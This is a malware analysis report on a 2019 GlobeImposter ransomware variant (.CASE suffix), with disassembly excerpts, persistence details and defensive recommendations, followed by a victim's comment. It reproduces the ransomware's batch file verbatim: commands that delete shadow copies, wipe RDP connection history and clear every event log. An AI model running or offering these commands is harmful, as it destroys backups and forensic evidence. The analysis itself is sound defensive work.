Analysis of CASE A Latest Variant of the GlobeImposter Family
1 Sample OverviewRecently, researchers from Huawei Weiran Labs have captured a new ransomware sample. After analysis, it is found that the behavior of the sample is almost identical to that of the ransomware family GlobeImposter’s samples. A comparison of the sample’s code with code of GlobeImposter family 2018 samples shows a code similarity of above 80%. The sample compilation timestamp is February 2, 2019, from which it can be determined that the sample is the latest variant of the GlobeImposter family. The GlobeImposter ransomware family was first discovered in May 2017, after which several large-scale outbreaks were discovered. Some extensions of files encrypted by earlier versions of the family include .CHAK, .crypted!, .dream, .TRUE, .doc, .Tiger4444, Ox4444. The family uses RSA+AES encryption to encrypt files. No organization has yet announced an effective decryption tool against the family. After the sample runs, it copies itself to the system directory and creates a startup item. It then traverse the device drives, and encrypt files for ransom. A suffix of .CASE is used for encrypted files. A ransoming prompt text file named as how_to_back_files.html is released in the folder of each encrypted file. After the encryption is completed, a batch processing file will be released, records of login to remote devices from local device will be cleared, and local logs will be deleted. After the execution is completed, the sample will delete itself. After the ransomware encrypts files, a ransom message will be displayed without the cost of restoring files, but it provides E-mail addresses for victim to consult the price of file recovery. The content of the ransoming prompt text file how_to_back_files.html is as follows: The diagnosis result of the sample from HUAWEI sandbox product is as follows: 2 IOC
3 Sample CollectionWe first analyzed the processes of infected device, and no suspicious process was found. After restarting the device, it is found that the temporarily created file is encrypted, and a process named svchost.exe under non-system directory is found. We didn’t find the suspicious file in the process’s image file directory. The newly created file will not be encrypted after rebooting again. After analyzing the startup items of another infected device that has not been restarted, it is found that there is a suspicious key value in the Runonce startup item. The image path of the key value is identical to that of the suspicious process found in the first infected device. After the sample is collected into the experimental environment, it is confirmed by analysis that the sample is the ransomware sample. 4 Sample AnalysisThe sample has a simple functionality and clear attack flow. The main execution flow diagram is as follows: 4.1 Environment InitializationAfter the malicious code is executed, the key for encrypting files is generated and the data to be used in the encryption process is decrypted. The decrypted data includes the suffix name for encrypted files, a white list of unencrypted files, and the name of the ransoming prompt text file, etc. There are a total of 43 whitelisted names of files that are not encrypted by the sample, the list is as follows: Windows、Microsoft、Microsoft Help、Windows App Certification Kit、Windows Defender、ESET、COMODO、Windows NT、Windows Kits、Windows Mail、 Windows Media Player、Windows Multimedia Platform、Windows Phone Kits、Windows Phone Silverlight Kits、Windows Photo Viewer、 Windows Portable Devices、Windows Sidebar、WindowsPowerShell、NVIDIA Corporation、Microsoft.NET、Internet Explorer、Kaspersky Lab、 McAfee、Avira spytech software、sysconfig、Avast、Dr.Web、Symantec、Symantec_Client_Security、system volume information、AVG、 Microsoft Shared、Common Files、Outlook Express、Movie Maker、Chrome、Mozilla、Firefox、Opera、YandexBrowser、ntldr、Wsus、ProgramData After analyzing the white list, it is found that it contains names of Microsoft system software folders and names of some antivirus software folders, and also contains a Russian browser folder name, from which it is supposed that the developer of the sample may be a hacker using Russian as the mainstream language. The string decryption disassembly code is as follows: .rdata:00409CED push edi ; hFile .rdata:00409CEE push 20h ; int .rdata:00409CF0 push dword_40CA9C ; int .rdata:00409CF6 mov esi, offset suffix_str .rdata:00409CFB push 30h ; int .rdata:00409CFD push esi ; int .rdata:00409CFE call decode_str .rdata:00409D03 push edi ; hFile .rdata:00409D04 push 20h ; int .rdata:00409D06 push dword_40CA9C ; int .rdata:00409D0C push 30h ; int .rdata:00409D0E push offset report_name_str ; int .rdata:00409D13 call decode_str .rdata:00409D18 push edi ; CodePage .rdata:00409D19 push esi ; lpMultiByteStr .rdata:00409D1A call sub_409408 .rdata:00409D1F push 290h ; int .rdata:00409D24 push dword_40CA9C ; int .rdata:00409D2A mov dword_40CAA8, eax .rdata:00409D2F push offset dword_40CAAC ; int .rdata:00409D34 push offset except_suffix_str ; lpString .rdata:00409D39 call decode_except_str .rdata:00409D3E push 110h ; int .rdata:00409D43 push dword_40CA9C ; int .rdata:00409D49 mov dword_40CAB0, eax .rdata:00409D4E push offset dword_40C648 ; int .rdata:00409D53 push offset except_folder_str ; lpString .rdata:00409D58 call decode_except_str 4.2 Copy itself and create a startup itemAfter the sample runs, it will copy itself to the system directory and create a startup item. Since the virus creates the startup item under the RunOnce key value, the sample is only executed after the restart. Since the sample has the function of deleting itself, the sample is deleted after the device is restarted. The information of the startup item created by the sample is as follows: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] "BrowserUpdateCheck"="C:\\Users\\Administrator\\AppData\\Local\\svchost.exe" The disassembly code of “Copy file and create a startup item” .rdata:00409DCA push edi ; bFailIfExists .rdata:00409DCB push esi ; lpNewFileName .rdata:00409DCC push lpMem ; lpExistingFileName .rdata:00409DD2 call CopyFileW .rdata:00409DD8 test eax, eax .rdata:00409DDA jz short loc_409DE2 .rdata:00409DDC .rdata:00409DDC loc_409DDC: ; CODE XREF: sub_409C6B+15Dj .rdata:00409DDC push esi ; lpString2 .rdata:00409DDD .rdata:00409DDD loc_409DDD: ; CODE XREF: sub_409C6B+154j .rdata:00409DDD call create_reg_runonce 4.3 Create An Encryption Key Backup FileThe ransomware creates a file of key data used in the encryption process in the system directory. The file is stored in the following location: C:\Users\Public\2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1 The file content may be as follows: 8021F4619DEE61582FD12ACEA1CB4FB7F8BA1D82315758F1141F756269D85599414493C1539ED9FEDEAE53772DBEDF19697916535FE8CEBB525 E98ADEA50AF4AEFFC7641E723276EEB739F7894688343F595D563025F39F3B3DE6E927DE4B65E95A6F562D05F58A6584811612B208A5053304E 079A75841EEE6C9DE839186843 6F 23 EA E0 97 B4 4D EB 67 DE 34 33 7F F6 8A 67 47 85 C4 AF 22 9D 3A 81 A9 20 B2 10 A5 87 2F B0 D2 B5 AB 43 D0 AA 43 59 4C BE DE 23 38 89 53 66 E1 2C ED 87 4B 41 E3 F2 9A E9 9C 51 85 36 AB 91 4F BD 47 05 3C 2A D9 23 EB 4E BD B9 71 4C A7 6A 5B C5 72 CB AD 20 5D 5D 91 56 6E 20 C4 00 C7 1E D8 81 2E 81 A1 4E 0B 4E 22 21 12 49 9B 6A A7 B8 D8 80 71 C2 3F 50 50 CE 43 DF 51 D6 83 94 A8 A7 03 B4 6B A9 5E BF 91 38 34 8A 5B 52 D7 19 E2 94 97 25 3B 88 9F F3 21 A6 38 21 CA 8B AD 25 CC 9C 8E 98 56 14 57 5F 95 42 CC 26 B3 61 8A 17 E8 E5 2D 96 81 72 D3 42 26 A9 1D 2B 05 7A 2D BF 8F C0 21 A8 10 EE B4 14 A6 82 5F A8 BE 23 13 BD 00 82 86 A9 AA 86 73 16 FD 20 F2 9A 42 77 DE E9 0C E0 14 BD 96 21 4F 49 A0 E5 B8 0D 00 D8 D3 DC 13 2A 79 2E D2 6A B8 37 4C B1 5A DD 7D EB 1F F6 AF AF The disassembly code of “Create a key file” .rdata:00409DF4 push esi ; nSize .rdata:00409DF5 push edi ; lpBuffer .rdata:00409DF6 push offset aPublic ; "public" .rdata:00409DFB call ebx ; GetEnvironmentVariableW …… .rdata:00409E97 push ebx ; lpFileName .rdata:00409E98 call create_key_file 4.4 Traverse Drives and Encrypt FilesWhen the ransomware encrypts files of drives, it traverses the drive type and encrypts only the removable drive, the fixed drive, and the network drive. In addition, different from other ransomware programs that encrypt only files with specified suffix, the new variant encrypts all files on drives in the local device, but some files and folders are treated with exceptions. The exceptions are as follows: Exception 1: The ransoming prompt text file named as how_to_back_files.html is not encrypted. Exception 2: The key file saved by the virus is not encrypted, the file name is: 2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1 Exception 3: The currently launched ransomware file is not encrypted. Exception 4: A file whose last five bytes are .CASE is not encrypted. Exception 5: 43 whitelisted directories are not encrypted. Exception 6: Files with a file size of 0 are not encrypted. The disassembly code of “traverse system drives” is as follows: .rdata:004099FD push eax ; lpRootPathName .rdata:004099FE call GetDriveTypeA .rdata:00409A04 cmp eax, 3 .rdata:00409A07 jz short loc_409A13 .rdata:00409A09 cmp eax, 2 .rdata:00409A0C jz short loc_409A13 .rdata:00409A0E cmp eax, 4 .rdata:00409A11 jnz short loc_409A3C The drive types are defined as below: The disassembly code of “filename exceptions of exception 1 - exception 3 ” .rdata:0040987C lea eax, [esp+25B4h+FindFileData.cFileName] .rdata:00409880 push eax ; lpString1 .rdata:00409881 call esi ; lstrcmpiW .rdata:00409883 test eax, eax .rdata:00409885 jz loc_409942 .rdata:0040988B push lpString2 ; lpString2 .rdata:00409891 lea eax, [esp+25B4h+FindFileData.cFileName] .rdata:00409895 push eax ; lpString1 .rdata:00409896 call esi ; lstrcmpiW .rdata:00409898 test eax, eax .rdata:0040989A jz loc_409942 .rdata:004098A0 push lpMem ; pszPath .rdata:004098A6 call PathFindFileNameW .rdata:004098AC push eax ; lpString2 .rdata:004098AD lea eax, [esp+25B4h+FindFileData.cFileName] .rdata:004098B1 push eax ; lpString1 .rdata:004098B2 call esi ; lstrcmpiW The disassembly code of “suffix name and whitelist exceptions of exception 4 - exception 5” .rdata:00409284 loop_match: ; CODE XREF: sub_40923F+8Dj .rdata:00409284 push [esp+14h+lpString] ; lpString .rdata:00409288 call lstrlenA .rdata:0040928E push dword ptr [edi+ebx*4] ; lpString .rdata:00409291 mov esi, eax .rdata:00409293 call lstrlenA .rdata:00409299 cmp esi, eax .rdata:0040929B jl short loc_4092C9 .rdata:0040929D mov esi, [edi+ebx*4] .rdata:004092A0 push esi ; lpString .rdata:004092A1 call lstrlenA .rdata:004092A7 mov edi, [esp+14h+lpString] .rdata:004092AB push esi ; lpString2 .rdata:004092AC push [esp+18h+lpString] ; lpString .rdata:004092B0 sub edi, eax .rdata:004092B2 call lstrlenA .rdata:004092B8 add eax, edi .rdata:004092BA push eax ; lpString1 .rdata:004092BB call lstrcmpiA .rdata:004092C1 test eax, eax .rdata:004092C3 jz short match_white_list .rdata:004092C5 mov edi, [esp+14h+var_4] .rdata:004092C9 .rdata:004092C9 loc_4092C9: ; CODE XREF: sub_40923F+5Cj .rdata:004092C9 inc ebx .rdata:004092CA cmp ebx, ebp .rdata:004092CC jb short loop_match The disassembly code of “empty file exception of exception 6” .rdata:00408DDD push ebx ; hTemplateFile .rdata:00408DDE push 80000000h ; dwFlagsAndAttributes .rdata:00408DE3 push 3 ; dwCreationDisposition .rdata:00408DE5 push ebx ; lpSecurityAttributes .rdata:00408DE6 push ebx ; dwShareMode .rdata:00408DE7 push 0C0000000h ; dwDesiredAccess .rdata:00408DEC push [esp+1B8h+lpFileName] ; lpFileName .rdata:00408DF3 call CreateFileW .rdata:00408DF9 mov ebx, eax .rdata:00408DFB cmp ebx, 0FFFFFFFFh .rdata:00408DFE jz next_loop .rdata:00408E04 lea eax, [esp+1A0h+var_184] .rdata:00408E08 push eax .rdata:00408E09 push ebx .rdata:00408E0A call GetFileSizeEx .rdata:00408E10 test eax, eax .rdata:00408E12 jz next_loop .rdata:00408E18 mov eax, dword ptr [esp+1A0h+var_184] .rdata:00408E1C or eax, dword ptr [esp+1A0h+var_184+4] .rdata:00408E20 jz next_loop 4.5 Delete Data Backup and Remove Attack TracesAfter the ransomware traverses all drives and encrypts files, it will release a batch processing file in the temporary directory, the file will delete the shadow copy, clear the records of login to remote devices from local device, and clear the device log. The content of batch processing file is as follows: @echo off vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" In the batch processing file, the second line is used to delete the shadow copy, the third line to the eighth line is used to clear the records of login to remote devices from local device, and the last line is used to clean up all local logs. The disassembly code of “create and execute the batch processing file” is as follows: .rdata:00409463 push esi ; lpBuffer .rdata:00409464 push 800h ; nBufferLength .rdata:00409469 call GetTempPathW .rdata:0040946F push edi ; lpTempFileName .rdata:00409470 xor ebx, ebx .rdata:00409472 push ebx ; uUnique .rdata:00409473 push offset PrefixString ; "tmp" .rdata:00409478 push esi ; lpPathName .rdata:00409479 call GetTempFileNameW .rdata:0040947F push offset String2 ; ".bat" .rdata:00409484 push edi ; lpString1 .rdata:00409485 call lstrcatW .rdata:0040948B push ebx ; hTemplateFile .rdata:0040948C push 80h ; dwFlagsAndAttributes .rdata:00409491 push 2 ; dwCreationDisposition .rdata:00409493 push ebx ; lpSecurityAttributes .rdata:00409494 push ebx ; dwShareMode .rdata:00409495 push 40000000h ; dwDesiredAccess .rdata:0040949A push edi ; lpFileName .rdata:0040949B call CreateFileW .rdata:004094A1 cmp eax, 0FFFFFFFFh .rdata:004094A4 jz short loc_4094C3 .rdata:004094A6 push eax ; hFile .rdata:004094A7 push 20h ; int .rdata:004094A9 push offset byte_401124 ; int .rdata:004094AE push 1D0h ; int .rdata:004094B3 push offset dword_401358 ; int .rdata:004094B8 call decode_str .rdata:004094BD push edi ; lpCommandLine .rdata:004094BE call run_bat 4.6 Self-deleteBefore the ransomware program exits, it deletes itself through batch processing command. The disassembly code of “creates the self-delete command to delete itself” is as follows: .rdata:0040957B push offset aCDel ; "/c del " .rdata:00409580 push eax ; lpString1 .rdata:00409581 call esi ; lstrcatW .rdata:00409583 lea eax, [ebp+Filename] .rdata:00409589 push eax ; lpString2 .rdata:0040958A lea eax, [ebp+String1] .rdata:00409590 push eax ; lpString1 .rdata:00409591 call esi ; lstrcatW .rdata:00409593 push offset aNul ; " > nul" .rdata:00409598 lea eax, [ebp+String1] .rdata:0040959E push eax ; lpString1 .rdata:0040959F call esi ; lstrcatW .rdata:004095A1 lea eax, [ebp+Buffer] .rdata:004095A7 mov [ebp+ExecInfo.cbSize], 3Ch .rdata:004095AE mov [ebp+ExecInfo.lpFile], eax .rdata:004095B1 lea eax, [ebp+String1] .rdata:004095B7 push 40h .rdata:004095B9 mov [ebp+ExecInfo.lpParameters], eax .rdata:004095BC lea eax, [ebp+ExecInfo] .rdata:004095BF pop esi .rdata:004095C0 push eax ; lpExecInfo .rdata:004095C1 mov [ebp+ExecInfo.hwnd], edi .rdata:004095C4 mov [ebp+ExecInfo.lpVerb], offset aOpen ; "Open" .rdata:004095CB mov [ebp+ExecInfo.lpDirectory], edi .rdata:004095CE mov [ebp+ExecInfo.nShow], edi .rdata:004095D1 mov [ebp+ExecInfo.fMask], esi .rdata:004095D4 call ShellExecuteExW 5 Sum-upThe sample has a simple functionality and clear purpose. In addition to encrypting the data of the infected device, it cleans up remote login traces of the device and log records. The sample has self-delete function and creates a runonce startup item, so it will be completely deleted after the infected device is restarted, which means, after the infected device is restarted for the second time, the data in the infected device will not be encrypted. 6 Security RecommendationsAfter analysis, it is found that the sample is a member of GlobeImposter family compiled in February 2019. So far, many cases of the ransomware infection have been found, and an outbreak of the ransomware attack is expected, so the security personnel should take appropriate security measures to protect their key devices. Since the GlobeImposter family implements implantation mainly by cracking remote login password through brute force, you can effectively reduce the possibility of being attacked by setting a high complexity remote desktop login password, using different login passwords for different devices on the intranet, limiting the IP address of the remote login device, turning off unnecessary remote login service. If you need to collect the virus sample after being infected, do not restart or shut down the device, otherwise the virus sample will delete itself. |
-
brunoftr 2019-04-04 07:10:54 Hello, we were attacked by this ransomware in our company, we are with a stopped server, would you already have some descriptor for this virus?